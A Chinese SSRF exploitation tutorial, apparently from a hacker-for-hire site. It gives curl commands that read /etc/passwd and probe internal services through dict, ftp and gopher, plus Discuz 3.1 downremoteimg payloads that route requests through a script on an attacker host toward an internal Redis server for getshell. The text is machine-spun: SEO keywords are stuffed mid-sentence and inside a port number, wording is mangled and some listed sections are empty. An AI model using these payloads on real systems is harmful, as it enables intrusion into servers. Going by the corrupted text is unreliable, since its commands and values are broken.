首页 黑客接单正文

黑客cmd命令大全-简单的黑客代码-SSRF漏洞利用与getshell实战

hacker 黑客接单 2020-11-11 221 4

简易的黑客编码-SSRF漏洞利用与getshell实战演练

什么叫SSRF?

SSRF(Server-Side Request Forgery,服务器端要求仿冒)是一种由 *** 攻击结构要求,利用服务器端进行的安全性漏洞。一般状况下,SSRF进攻的总体目标是外网地址无法打开的內部系统软件(正由于要求是由服务器端进行的,因此 *** 服务器能要求到与本身相接到外网防护的內部系统软件)。

Example:

GET /index.php?url=http://google.com/ HTTP/1.1

Host: example.com

在黑客cmd命令全集这儿,http://example.com从它的 *** 服务器获得http://google.com

文件目录

0X00 SSRF的种类

0X01 哪些地方最非常容易出現SSRF

0X02 SSRF漏洞的伤害

0X03 黑客cmd命令全集 SSRF武器Curl的应用

0X04 最常见的自动跳转绕开

0X05 Python SSRF完成端口扫描器

0X06 利用Discuz的SSRF漏洞GetShell

0X07 简易的绕开SSRF图片的限定

0X08 很有可能碰到的难题

0X09 常见发掘SSRF漏洞的专用工具

0X00 SSRF的种类

1. 显示信息 *** 攻击的回应(Basic)

2. 无法显示回应(Blind)

0X01 哪些地方最非常容易出現SSRF

云主机商。(各种各样网黑客cmd命令全集站数据库操作)

有远程控制图片载入的地区。(在线编辑器这类的有远程控制图片载入啊)

网址收集、网页页面爬取的地区。(许多 网址会出现新闻报道收集键入url随后一键收集)

头像图片的地区。(某易就爱远程控制载入头像图片,比如:https://www.xxxx.com/image?url=http://www.image.com/1.jpg)

最后一个一切想要你输入网址的地区和能够键入ip的都放,全是ssrf的天地。

0X02 SSRF漏洞的伤害

对 *** 服务器所属的内部网开展端口扫描器,获得一些服务项目的banner信息内容等

进攻运黑客cmd命令大全行以内网或是当地的应用软件

对里网WEB运用开展指纹验证,根据浏览默认设置文档完成(Readme等文档)

进攻內外网的WEB运用,主要是GET就可以完成的进攻(例如Struts2,SQL引入等)

免费下载内网资源(利用file协议书载入本地文件等)

利用Redis未受权浏览,HTTP CRLF引入做到getshell

wooyun高峰会猪猪侠的ppt

开展起点、跳板

忽视cdn

0X03 SSRF武器Curl的应用

查询curl适用的协议书目录 #curl--config 黑客cmd命令全集 –protocols

应用curl读取文件

curl -v file:///etc/passwd

应用ftp协议书

curl -v "ftp://127.0.0.1:6666/info"

应用dict协议书

curl -v "dict://127.0.0.1:6666/info"

应用gopher协议书

curl -v "gopher://127.0.0.1:6666/_info"

0X04最常见的自动跳转绕开

0X05 Python SSRF完成端口扫描器

简易的端口扫描器

另外观查Wireshark全部扫描仪步骤

编码完成:

认证当地是不是打开了相对的端口号

Python编码撰写的构思:

端口号存有联接会一直在联接,连接时间会较长。

端口号不会有的联接会被立刻更新

0X06 利用Discuz的SSRF漏洞GetShell

Discuz没有理由限定ssrf漏洞(<=3.1检测是有这一漏洞)

试验自然环境:

172.28.100.109 为Discuz 黑客cmd命令全集 3.1(Win10),172.28.100.108为Redis *** 服务器(CentOS),hacker.xxxx.com为外网地址检测 *** 服务器关键储放ssrf用的php文件

Discuz3.1下载链接:

http://www.comsenz.com/downloads/install/discuzx#down_open

实例:

/forum.php?mod=ajax&action=downremoteimg&message=[img]http://hacker.xxxx.com/ssrf.php?s=dict&ip=172.28.100.108&port=6666&data=hello.jpg[/img]

具体应用payload:

http://127.0.0.1/Discuz_X3.1/upload/forum.php?mod=ajax&action=downremoteimg&message=[img]http://hacker.xxxx.com/ssrf.php?s=ftp&ip=172.28.100.108&port=66黑客cmd命令全集66&data=he2lo.jpg[/img]

利用nc来检测SSRF漏洞

http://127.0.0.1/Discuz_X3.1/upload/forum.php?mod=ajax&action=downremoteimg&message=[img]http://172.28.100.108:6666/?data=root.jpg[/img]

tcpdump抓包软件见到Discuz发过来的数据文件

nc也是有反映了

基础能够确定这儿是有SSRF漏洞

应用header 来相互配合ssrf漏洞利用,在我外网地址 *** 服务器放了一个ssrf.php

相关文章

    怎样在qq上找黑客-s2-029Struts2标签远程控制代码执行剖析标签详细介绍Struts2标签库提供了主题、模板适用,巨大地简单化了主视图页面的撰写,并且,struts2的主题、模板都提供了非常好的扩展性。完成了更强的编码多路复用。Struts2容许在页面中应用自定部件,这彻底...

    黑客知识网 116 2020-11-11

    简易的黑客编码-SSRF漏洞利用与getshell实战演练什么叫SSRF?SSRF(Server-SideRequestForgery,服务器端要求仿冒)是一种由 *** 攻击结构要求,利用服务器端进行的安全性漏洞。一般状况下,SSRF进攻的总体目标是外网地址无法打开的內部系统软件(正由于要求是由服务器端进行的,因此 *** 服务器能要求到与本身相接到外网防护的內部系统软件)。Example:GET/...

    黑客知识网 55 2020-11-11

留言评论

留言与评论(共有 0 条评论)
   
验证码:
版权声明

本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。